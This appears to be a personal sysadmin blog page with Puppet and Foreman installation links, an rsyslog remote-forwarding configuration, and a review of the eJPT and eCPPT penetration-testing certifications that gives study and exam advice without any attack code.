https://www.linode.com/docs/applications/puppet/install-and-configure-puppet

Installation:
http://prolinuxhub.com/install-forman-on-centos-7/
http://www.linuxtechi.com/install-and-configure-foreman-on-centos-7-x/
http://www.itzgeek.com/how-tos/linux/ubuntu-how-tos/install-foreman-on-centos-7-rhel-7-ubuntu-14-04-3.html
http://www.ehowstuff.com/disable-ipv6-on-redhat-centos-6-centos-7/
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet
https://ask.puppet.com/question/2451/how-do-you-change-the-runinterval/
https://linuxconfig.org/puppet-agent-exiting-no-certificate-found-and-waitforcert-is-disabled-solution
http://devopspy.com/devops/install-puppet-master-agent-on-centos-7/
http://opensourceforu.com/2011/01/data-centre-automation-puppet-resources-types-examples/
https://docs.puppet.com/puppet/latest/install_linux.html

Rsyslog UDP/TCP

There is a small, but important catch when you configure rsyslog - the protocol at the end of the config. For the classic UDP set on @ for TCP @@

# The authpriv file has restricted access.
authpriv.* /var/log/secure

# Log all the mail messages in one place.
mail.* -/var/log/maillog

# Log cron stuff
cron.* /var/log/cron

# Everybody gets emergency messages
*.emerg :omusrmsg:*

# Save news errors of level crit and higher in a special file.
uucp,news.crit /var/log/spooler

# Save boot messages also to boot.log
local7.* /var/log/boot.log

$ActionQueueFileName fwdRule1 # unique name prefix for spool files
$ActionQueueMaxDiskSpace 1g # 1gb space limit (use as much as possible)
$ActionQueueSaveOnShutdown on # save messages to disk on shutdown
$ActionQueueType LinkedList # run asynchronously
$ActionResumeRetryCount -1 # infinite retries if host is down
# remote host is: name/ip:port, e.g. 192.168.0.1:514, port optional
*.* @IP:514

References:
https://devops.profitbricks.com/tutorials/configure-remote-logging-with-rsyslog/
http://unix.stackexchange.com/questions/280697/rsyslog-not-forwarding-messages-to-remote-rsyslog-server
http://serverfault.com/questions/667728/configure-and-test-rsyslog-to-udp-socket
http://xmodulo.com/configure-rsyslog-client-centos.html

Tuesday, 10 October 2017

Microsoft Infrastructure Foundamentals

https://www.microsoft.com/en-us/download/details.aspx?id=45520&WT.mc_id=rss_alldownloads_all

Thursday, 3 August 2017

Review eLearnSecurity eJPT, eCPPT

Currently I have been holding some penetration testing certifications from eLearnSecurity and passed them:

eJPT
eCPPT

I would like to share my experience here.

About the labs, the labs they are quite different in approach compared to other certifications - the orientation is to skills rather to CTF targets. Personally I found it better choice since you learn quite a lot in a very short time (if you are dedicated). Not having free time - my only option was to learn in early morning 6 am to 8 am. After holding the eJPT I was able to pass also the eCPPT within a month.

Most important takeaways during the learning process:

- Do all the labs.

- Try to automate tasks and repeat the labs with the automated tools you have created.

- Know the flaws of your tools.

- Document everything and be organized.

- Read.

- Advance.

Labs

During the labs I found that some of the tools I use have changed in time, to be specific Metasploit. There are lots of online resources regarding Metasploit so this is not a big issue, but it will waste your time if you have not done you research. For example I was really surprised that some windows post exploitation tools are not supported anymore. So do you research in advance. Also try to understand how it can be done manually - for instance X tool does not work, as a work around I can export registry key Y, decrypt password Z etc.

"This lab does not work as expected" - Find the reason why. This might happen and you can get support from the forums and search the older topics to resolve your issue. My suggestion is to simulate the environment and understand how the attack works - locally, recreation of situations helps a lot to understand the circumstances you are dealing with and in most cases it can be just a setting you have overlooked.

Knowledge domains

In a nutshell eJPT gives you the ground knowledge, eCPPT is a deep-dive into the penetration testing world and also you get to practice "Exploit Development" - which itself is a huge knowledge domain. Pivoting is also a technique you have to master it is widely used and also will be of great advantage for yourself - you have to know, how you can "move" between networks. All topics are widely covered both theoretically and practically, my advice would be to take the practical part more seriously.

As they state:

eJPT:

Good knowledge of TCP/IP
Good knowledge of IP routing
Good knowledge of LAN protocols and devices
Good knowledge of HTTP and web techologies
Essential penetration testing processes and methodologies
Basic Vulnerability Assessment of Networks
Basic Vulnerability Assessment of Web Applications
Exploitation with Metasploit
Simple Web application Manual exploitation
Basic Information Gathering and Reconnaissance
Simple Scanning and Profiling the target

eCPPT:

Penetration testing processes and methodologies
Vulnerability Assessment of Networks
Vulnerability Assessment of Web Applications
Advanced Exploitation with Metasploit
Performing Attacks in Pivoting
Web application Manual exploitation
Information Gathering and Reconnaissance
Scanning and Profiling the target
Privilege escalation and Persistence
Exploit Development
Advanced Reporting skills and Remediation

Exams

Surprisingly fun, have not had that much fun in years. If you have done the labs you can not go wrong. If you have issues during the lab you can reset it, but remember that you will have to re-exploit all of your targets - automate as much as possible. Some of the targets are harder, but in time you will find your way in. The biggest advantage of both exams is that there is plenty of time. For eJPT as far as I remember 3 days for my criteria 24 h for this level is more than enough. eCCPT the exam was really interesting I completed it in 3 days including the report writing, but usually you get a week for the exam and a week for the report. In both exams you will get to test your learned skills, so again do the labs - properly.

About the penetration testing report for eCCPT. The report is the most interesting part - you will have to organize all of your information and prepare a detailed analysis, it is best to get it done manually if you want to have a good report and pass the exam.

Tools

You are not limited in any way.

References:

https://www.elearnsecurity.com/certification/ejpt/

https://www.elearnsecurity.com/certification/ecppt/

Pages

Tuesday, 1 May 2018

Exploiting Vulnserver

Friday, 27 April 2018

Installing Tripwire on Suse

Thursday, 19 April 2018

Installing SquidGuard on CentOS 7.x

Wednesday, 18 April 2018

Puppet Picks

Rsyslog UDP/TCP

Tuesday, 10 October 2017

Microsoft Infrastructure Foundamentals

Thursday, 3 August 2017

Review eLearnSecurity eJPT, eCPPT

About Me

Total Pageviews